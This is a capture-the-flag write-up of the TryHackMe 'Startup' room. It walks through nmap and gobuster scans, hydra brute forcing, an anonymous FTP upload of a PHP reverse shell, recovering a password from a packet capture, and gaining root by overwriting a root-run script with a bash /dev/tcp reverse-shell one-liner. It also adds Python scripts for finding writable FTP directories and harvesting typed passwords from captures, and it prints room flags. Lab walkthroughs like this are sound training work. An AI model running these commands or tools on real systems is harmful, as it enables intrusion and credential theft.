More than 1 year has passed since last update.

[TryHackMe] Startup #Writeup

Introduction

These are my own notes on the room.

What is the secret spicy soup recipe?

Run nmap.

$ nmap 10.10.221.23

Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-17 01:13 BST
Nmap scan report for ip-10-10-221-23.eu-west-1.compute.internal (10.10.221.23)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:DC:F9:F1:BD:FF (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.80 seconds

The web page on port 80 showed the following. Apparently they are looking for a web developer.

No spice here!

Please excuse us as we develop our site. We want to make it the most stylish and convienient way to buy peppers. Plus, we need a web developer. BTW if you're a web developer, contact us. Otherwise, don't you worry. We'll be online shortly!

-- Dev Team

Run gobuster to look for hidden directories.

gobuster dir -u http://10.10.221.23 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.221.23
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/07/17 01:21:36 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/files (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2024/07/17 01:21:38 Finished
===============================================================

Browse to /files. Directory listing is enabled:

Index of /files
Name               Last modified       Size
Parent Directory                       -
ftp/               2020-11-12 04:53    -
important.jpg      2020-11-12 04:02    246K
notice.txt         2020-11-12 04:53    208
Apache/2.4.18 (Ubuntu) Server at 10.10.221.23 Port 80

notice.txt

Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

important.jpg was an Among Us meme image.
notice.txt reveals the name of a team member, Maya.
The ftp/ directory is worth a look.

$ ftp 10.10.221.23
Connected to 10.10.221.23.
220 (vsFTPd 3.0.3)
Name (10.10.221.23:root): Maya
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.

I tried an empty password, but it was rejected.
Try to find the password with hydra. (The username is only a guess taken from the note; Linux accounts are case-sensitive and almost always lowercase, so maya would have been the likelier spelling.)

$ hydra -l Maya -P /usr/share/wordlists/rockyou.txt 10.10.221.23 ftp
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2024-07-17 01:37:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ftp://10.10.221.23:21/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 14344110 to do in 830:06h, 16 active
[STATUS] 293.33 tries/min, 880 tries in 00:03h, 14343518 to do in 814:59h, 16 active
[STATUS] 285.57 tries/min, 1999 tries in 00:07h, 14342399 to do in 837:04h, 16 active

Waited a while, but at roughly 290 tries per minute against 14 million entries this is never going to finish.
Try common.txt instead. It is a directory-brute-force wordlist rather than a password list, so this is a long shot.

$ hydra -l Maya -P /usr/share/wordlists/dirb/common.txt 10.10.221.23 ftp
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2024-07-17 01:53:06
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4614 login tries (l:1/p:4614), ~289 tries per task
[DATA] attacking ftp://10.10.221.23:21/
[STATUS] 304.00 tries/min, 304 tries in 00:01h, 4310 to do in 00:15h, 16 active
[STATUS] 282.67 tries/min, 848 tries in 00:03h, 3766 to do in 00:14h, 16 active
[STATUS] 283.71 tries/min, 1986 tries in 00:07h, 2628 to do in 00:10h, 16 active
[STATUS] 281.92 tries/min, 3383 tries in 00:12h, 1231 to do in 00:05h, 16 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2024-07-17 02:09:40

Sad 😢
Try SSH as well.

$ hydra -l Maya -P /usr/share/wordlists/dirb/common.txt 10.10.221.23 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2024-07-17 02:30:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4614 login tries (l:1/p:4614), ~289 tries per task
[DATA] attacking ssh://10.10.221.23:22/
[STATUS] 260.00 tries/min, 260 tries in 00:01h, 4357 to do in 00:17h, 16 active
[STATUS] 246.67 tries/min, 740 tries in 00:03h, 3877 to do in 00:16h, 16 active
[STATUS] 243.00 tries/min, 1701 tries in 00:07h, 2918 to do in 00:13h, 16 active
[STATUS] 241.75 tries/min, 2901 tries in 00:12h, 1718 to do in 00:08h, 16 active
[STATUS] 241.18 tries/min, 4100 tries in 00:17h, 519 to do in 00:03h, 16 active
[STATUS] 241.17 tries/min, 4341 tries in 00:18h, 278 to do in 00:02h, 16 active
[STATUS] 241.11 tries/min, 4581 tries in 00:19h, 38 to do in 00:01h, 16 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2024-07-17 02:49:42

Total defeat.
Try connecting to FTP as anonymous. In hindsight this should have been the first check, before any brute force: nmap's default scripts (-sC) report anonymous FTP access via the ftp-anon script. Note that the target was redeployed at this point, so its IP is 10.10.100.208 from here on.

$ ftp 10.10.100.208
Connected to 10.10.100.208.
220 (vsFTPd 3.0.3)
Name (10.10.100.208:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.

Got in.
The files visible here are the same ones seen in the browser, which suggests the FTP root is the /files directory Apache serves.
Since we can upload files over FTP, aim for a reverse shell.
Download php-reverse-shell.php.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Edit php-reverse-shell.php so that the $ip and $port variables near the top of the file point at the attacker's machine and the port the listener will use (5555 below).

nano php-reverse-shell.php

Send the file to the target over FTP.

$ ftp 10.10.100.208
Connected to 10.10.100.208.
220 (vsFTPd 3.0.3)
Name (10.10.100.208:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
200 PORT command successful. Consider using PASV.
553 Could not create file.

This directory does not accept uploads (553 Could not create file).

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.
ftp> cd ftp
250 Directory successfully changed.
ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5494 bytes sent in 0.00 secs (149.6996 MB/s)

After moving one level down into the ftp directory, which the listing shows as world-writable (drwxrwxrwx), the upload succeeded.

All that is left is to start a listener and trigger the PHP file from the web. Because the FTP root is the same directory Apache serves as /files, the upload is reachable at http://10.10.100.208/files/ftp/php-reverse-shell.php.

$ nc -nlvp 5555

Requesting the PHP file in the browser gives us a shell!

$ nc -nlvp 5555
Listening on [0.0.0.0] (family 0, port 5555)
Connection from 10.10.100.208 33068 received!
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 00:51:54 up 18 min,  0 users,  load average: 0.00, 0.01, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
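
As an added example (my own code, not from the original writeup or the room), the writable-directory hunt above done with Python's standard-library ftplib: rank directories by the 'other' write bit in the LIST output, then confirm each candidate with a STOR probe, because mode bits in a listing are only a hint while the server's 553 or 226 answer is the truth. The host, the anonymous credentials, the probe filename and the CLI usage are assumptions; the sample listing is the one the box returned above.

```python
"""Find where an anonymous FTP login can really write, then confirm it with the server."""
import io
from ftplib import FTP, error_perm

# The listing the box returned above (copied from the writeup, not generated here).
SAMPLE_LISTING = [
    "drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp",
    "-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg",
    "-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt",
]


def parse_list_line(line):
    """Split one Unix-style LIST line into (mode_string, name); None for 'total' or odd lines."""
    parts = line.split(None, 8)
    if len(parts) < 9 or len(parts[0]) != 10:
        return None
    return parts[0], parts[8]


def world_writable_dirs(listing):
    """Directory names whose 'other' write bit is set (drwxrwxrwx), from LIST output lines."""
    found = []
    for line in listing:
        parsed = parse_list_line(line)
        if parsed and parsed[0][0] == "d" and parsed[0][8] == "w":
            found.append(parsed[1])
    return found


def probe_writable(ftp, directory, probe=".writetest"):
    """Ask the server rather than trusting mode bits: STOR an empty file, then delete it."""
    try:
        ftp.cwd(directory)
        ftp.storbinary(f"STOR {probe}", io.BytesIO(b""))
    except error_perm:            # e.g. '553 Could not create file.' as seen in the writeup
        return False
    try:
        ftp.delete(probe)         # clean up; some servers allow STOR but refuse DELE
    except error_perm:
        pass
    return True


def find_writable(host, user="anonymous", password="anonymous@", port=21):
    """Log in, list the root, probe '.' plus every world-writable subdirectory; return the confirmed ones."""
    ftp = FTP()
    ftp.connect(host, port, timeout=10)
    ftp.login(user, password)
    listing = []
    ftp.retrlines("LIST", listing.append)
    root = ftp.pwd()
    confirmed = []
    for directory in ["."] + world_writable_dirs(listing):
        ftp.cwd(root)                       # probe every candidate relative to the FTP root
        if probe_writable(ftp, directory):
            confirmed.append(directory)
    ftp.quit()
    return confirmed


if __name__ == "__main__":
    import sys
    print(find_writable(sys.argv[1]))       # usage: python3 ftp_writable.py <host>
```

Only the listing parser is exercised offline; find_writable needs a live target, and on a box where the FTP root is also the web root every confirmed directory is a place from which uploaded PHP will execute.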

Found recipe.txt (it sits in /, the filesystem root).

$ cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

Classy.

love

What are the contents of user.txt?

Search for user.txt with find.

$ find / -name user.txt 2> /dev/null
$ 

Not found. The 2> /dev/null hides the reason: www-data cannot enter /home/lennie (the Permission denied shows up later), so find never sees what is in there.

After exploring for a while, a packet capture named suspicious.pcapng turns up under the incidents directory.

To analyze it locally, copy it into the world-writable FTP directory from earlier, which is also served over HTTP.

$ cp /incidents/suspicious.pcapng /var/www/html/files/ftp

Checking the ftp folder in the browser, the file could be downloaded.

Investigate suspicious.pcapng with Wireshark.
192.168.22.139 can be seen talking to 192.168.22.139 on port 4444, a classic reverse-shell port.
Following the TCP stream (Analyze > Follow > TCP Stream; on the command line, tshark -r suspicious.pcapng -q -z follow,tcp,ascii,0 prints the same thing) shows the following.

Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:40:21 up 20 min,  1 user,  load average: 0.00, 0.03, 0.12
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
vagrant  pts/0    10.0.2.2         17:21    1:09   0.54s  0.54s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls
bin
boot
data
dev
etc
home
incidents
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
recipe.txt
root
run
sbin
snap
srv
sys
tmp
usr
vagrant
var
vmlinuz
vmlinuz.old
$ ls -la
total 96
drwxr-xr-x  26 root     root      4096 Oct  2 17:24 .
drwxr-xr-x  26 root     root      4096 Oct  2 17:24 ..
drwxr-xr-x   2 root     root      4096 Sep 25 08:12 bin
drwxr-xr-x   3 root     root      4096 Sep 25 08:12 boot
drwxr-xr-x   1 vagrant  vagrant    140 Oct  2 17:24 data
drwxr-xr-x  16 root     root      3620 Oct  2 17:20 dev
drwxr-xr-x  95 root     root      4096 Oct  2 17:24 etc
drwxr-xr-x   4 root     root      4096 Oct  2 17:26 home
drwxr-xr-x   2 www-data www-data  4096 Oct  2 17:24 incidents
lrwxrwxrwx   1 root     root        33 Sep 25 08:12 initrd.img -> boot/initrd.img-4.4.0-190-generic
lrwxrwxrwx   1 root     root        33 Sep 25 08:12 initrd.img.old -> boot/initrd.img-4.4.0-190-generic
drwxr-xr-x  22 root     root      4096 Sep 25 08:22 lib
drwxr-xr-x   2 root     root      4096 Sep 25 08:10 lib64
drwx------   2 root     root     16384 Sep 25 08:12 lost+found
drwxr-xr-x   2 root     root      4096 Sep 25 08:09 media
drwxr-xr-x   2 root     root      4096 Sep 25 08:09 mnt
drwxr-xr-x   2 root     root      4096 Sep 25 08:09 opt
dr-xr-xr-x 125 root     root         0 Oct  2 17:19 proc
-rw-r--r--   1 www-data www-data   136 Oct  2 17:24 recipe.txt
drwx------   3 root     root      4096 Oct  2 17:24 root
drwxr-xr-x  25 root     root       960 Oct  2 17:23 run
drwxr-xr-x   2 root     root      4096 Sep 25 08:22 sbin
drwxr-xr-x   2 root     root      4096 Oct  2 17:20 snap
drwxr-xr-x   3 root     root      4096 Oct  2 17:23 srv
dr-xr-xr-x  13 root     root         0 Oct  2 17:19 sys
drwxrwxrwt   7 root     root      4096 Oct  2 17:40 tmp
drwxr-xr-x  10 root     root      4096 Sep 25 08:09 usr
drwxr-xr-x   1 vagrant  vagrant    118 Oct  1 19:49 vagrant
drwxr-xr-x  14 root     root      4096 Oct  2 17:23 var
lrwxrwxrwx   1 root     root        30 Sep 25 08:12 vmlinuz -> boot/vmlinuz-4.4.0-190-generic
lrwxrwxrwx   1 root     root        30 Sep 25 08:12 vmlinuz.old -> boot/vmlinuz-4.4.0-190-generic
$ whoami
www-data
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@startup:/$ cd
cd
bash: cd: HOME not set
www-data@startup:/$ ls
ls
bin   etc	  initrd.img.old  media  recipe.txt  snap  usr	    vmlinuz.old
boot  home	  lib		  mnt	 root	     srv   vagrant
data  incidents   lib64		  opt	 run	     sys   var
dev   initrd.img  lost+found	  proc	 sbin	     tmp   vmlinuz
www-data@startup:/$ cd home
cd home
www-data@startup:/home$ cd lennie
cd lennie
bash: cd: lennie: Permission denied
www-data@startup:/home$ ls
ls
lennie
www-data@startup:/home$ cd lennie
cd lennie
bash: cd: lennie: Permission denied
www-data@startup:/home$ sudo -l
sudo -l
[sudo] password for www-data: c4ntg3t3n0ughsp1c3

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: c4ntg3t3n0ughsp1c3

sudo: 3 incorrect password attempts
www-data@startup:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ftp:x:112:118:ftp daemon,,,:/srv/ftp:/bin/false
lennie:x:1002:1002::/home/lennie:
ftpsecure:x:1003:1003::/home/ftpsecure:
www-data@startup:/home$ exit
exit
exit
$ exit

A password was typed at the sudo prompt, and it was not accepted for www-data. Whoever sat on the other end of that reverse shell knew somebody's password, though, so it may be lennie's.
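
As an added example (my own code, not part of the original writeup or the room), the same stream-following and credential harvesting done with the Python standard library alone: a minimal pcapng reader that walks the blocks, reassembles both directions of every TCP conversation touching port 4444 in capture order, the way Wireshark's Follow TCP Stream does, and pulls out whatever was typed at each "[sudo] password for" prompt. The capture it runs on is constructed inline from the prompts visible above (the attacker address 192.168.22.100 and the port numbers are made up); pass the path to suspicious.pcapng on the command line to run it on the real file. It handles only Ethernet/IPv4/TCP and ignores retransmissions and out-of-order segments, which is enough for a capture like this one.

```python
"""Pull credentials typed into a captured reverse shell out of a pcapng file (stdlib only)."""
import re
import struct
from collections import defaultdict

SHB, IDB, EPB = 0x0A0D0D0A, 0x00000001, 0x00000006
SUDO_PROMPT = re.compile(r"\[sudo\] password for \S+: ?([^\r\n]*)")


def iter_blocks(data):
    """Yield (block_type, endian, body) for every pcapng block; endianness comes from each SHB."""
    off, endian = 0, "<"
    while off + 12 <= len(data):
        btype = struct.unpack_from("<I", data, off)[0]  # SHB type bytes are a palindrome, order irrelevant
        if btype == SHB:
            endian = "<" if data[off + 8:off + 12] == b"\x4d\x3c\x2b\x1a" else ">"
        total = struct.unpack_from(endian + "I", data, off + 4)[0]
        if total < 12 or off + total > len(data):
            break
        yield btype, endian, data[off + 8:off + total - 4]
        off += total


def follow_tcp(pcapng, port):
    """Concatenate both directions of every TCP conversation touching `port`, in capture order.
    Returns {conversation_key: bytes}, one entry per connection."""
    conversations = defaultdict(bytes)
    for btype, endian, body in iter_blocks(pcapng):
        if btype != EPB or len(body) < 20:
            continue
        cap_len = struct.unpack_from(endian + "I", body, 12)[0]
        pkt = body[20:20 + cap_len]
        if len(pkt) < 34 or pkt[12:14] != b"\x08\x00" or pkt[23] != 6:  # IPv4 over Ethernet, TCP only
            continue
        ihl = (pkt[14] & 0x0F) * 4
        src, dst = ".".join(map(str, pkt[26:30])), ".".join(map(str, pkt[30:34]))
        tcp = pkt[14 + ihl:]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]
        if port in (sport, dport) and payload:
            conversations[tuple(sorted([(src, sport), (dst, dport)]))] += payload
    return dict(conversations)


def sudo_attempts(transcript):
    """Every value typed at a '[sudo] password for <user>:' prompt, including empty ones."""
    return SUDO_PROMPT.findall(transcript)


def credentials_from_capture(pcapng, port=4444):
    """Distinct non-empty sudo password attempts seen on any conversation involving `port`."""
    found = []
    for stream in follow_tcp(pcapng, port).values():
        for attempt in sudo_attempts(stream.decode("utf-8", "replace")):
            if attempt and attempt not in found:
                found.append(attempt)
    return found


# --- constructed sample capture (not the box's real suspicious.pcapng) ------------------
def _block(btype, body):
    pad = (-len(body)) % 4
    total = 12 + len(body) + pad
    return struct.pack("<II", btype, total) + body + b"\0" * pad + struct.pack("<I", total)


def _tcp_packet(src, sport, dst, dport, payload):
    eth = b"\x02" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)  # checksums left zero
    return eth + ip + tcp + payload


def build_sample_pcapng(exchange):
    """Little-endian pcapng: one SHB, one Ethernet IDB, one EPB per (src, sport, dst, dport, payload)."""
    shb = _block(SHB, struct.pack("<IHHq", 0x1A2B3C4D, 1, 0, -1))
    idb = _block(IDB, struct.pack("<HHI", 1, 0, 65535))
    epbs = [_block(EPB, struct.pack("<IIIII", 0, 0, i, len(p), len(p)) + p)
            for i, p in enumerate(_tcp_packet(*e) for e in exchange)]
    return shb + idb + b"".join(epbs)


VICTIM, ATTACKER = "192.168.22.139", "192.168.22.100"  # attacker address is made up for the sample
SAMPLE_EXCHANGE = [  # mirrors the sudo prompts visible in the Follow TCP Stream output above
    (VICTIM, 33126, ATTACKER, 4444, b"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n$ "),
    (ATTACKER, 4444, VICTIM, 33126, b"sudo -l\n"),
    (VICTIM, 33126, ATTACKER, 4444, b"sudo -l\n[sudo] password for www-data: "),
    (ATTACKER, 4444, VICTIM, 33126, b"c4ntg3t3n0ughsp1c3\n"),
    (VICTIM, 33126, ATTACKER, 4444, b"\nSorry, try again.\n[sudo] password for www-data: "),
    (ATTACKER, 4444, VICTIM, 33126, b"\n"),
    (VICTIM, 33126, ATTACKER, 4444, b"\nSorry, try again.\n[sudo] password for www-data: "),
    (ATTACKER, 4444, VICTIM, 33126, b"c4ntg3t3n0ughsp1c3\n"),
    (VICTIM, 33126, ATTACKER, 4444, b"\nsudo: 3 incorrect password attempts\n"),
]

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pcapng(SAMPLE_EXCHANGE)
    print(credentials_from_capture(data))
```

Run with no argument to see the result on the sample; with the real capture, try other ports too if the reverse shell did not use 4444. The interesting part from a defender's view is the same one the attacker exploits here: a reverse shell without a TTY sends the sudo password in clear text over the wire, so a capture of the C2 channel is a credential leak.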

$ ssh lennie@10.10.100.208
The authenticity of host '10.10.100.208 (10.10.100.208)' can't be established.
ECDSA key fingerprint is SHA256:xXyVGVy1l27TVcjIQj2kgTTmLYN6WCB93YJB3mAHLkA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.100.208' (ECDSA) to the list of known hosts.
lennie@10.10.100.208's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-190-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

44 packages can be updated.
30 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

$ ls
Documents  scripts  user.txt
$ cat *
cat: Documents: Is a directory
cat: scripts: Is a directory
THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

Bingo!

THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

What are the contents of root.txt?

Use sudo -l to look for a privilege-escalation foothold.

$ sudo -l
sudo: unable to resolve host startup
[sudo] password for lennie: 
Sorry, user lennie may not run sudo on startup.

No luck...

Under the Documents directory there were three text files:

concern.txt
I got banned from your library for moving the "C programming language" book into the horror section. Is there a way I can appeal? --Lennie

list.txt
Shoppinglist: Cyberpunk 2077 | Milk | Dog food

note.txt
Reminders: Talk to Inclinant about our lacking security, hire a web developer, delete incident logs.

Under the scripts directory there were the following two files:

planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

startup_list.txt (1 byte; written by planner.sh)

ls -l
total 8
-rwxr-xr-x 1 root root 77 Nov 12  2020 planner.sh
-rw-r--r-- 1 root root  1 Jul 18 01:53 startup_list.txt

This looks like the real lead. planner.sh is owned by root and we cannot change it, but startup_list.txt was modified only minutes ago, so something is running planner.sh periodically, presumably as root (a root cron job is the usual mechanism; cat /etc/crontab would confirm it).
planner.sh executes /etc/print.sh, so whatever is in print.sh runs with the same privileges as planner.sh.

/etc/print.sh
#!/bin/bash
echo "Done!"
$ ls -l
....
-rwx------ 1 lennie lennie    25 Nov 12  2020 print.sh
....

print.sh is owned by lennie and writable only by lennie, which is exactly what we need: plant a reverse shell in it.

Some searching turned up a usable one-liner (10.10.225.85 is the attacker's VPN address; replace it with your own). It overwrites the file and drops the shebang, but when bash fails to exec a file that is not a binary it falls back to running it as a shell script, so planner.sh still executes it.

$ echo 'bash -c "bash -i >& /dev/tcp/10.10.225.85/5555 0>&1"' > /etc/print.sh

Now listen and wait, and...

nc -nlvp 5555
Listening on [0.0.0.0] (family 0, port 5555)
Connection from 10.10.100.208 33136 received!
bash: cannot set terminal process group (2010): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# ls
ls
root.txt

Got root.txt!!
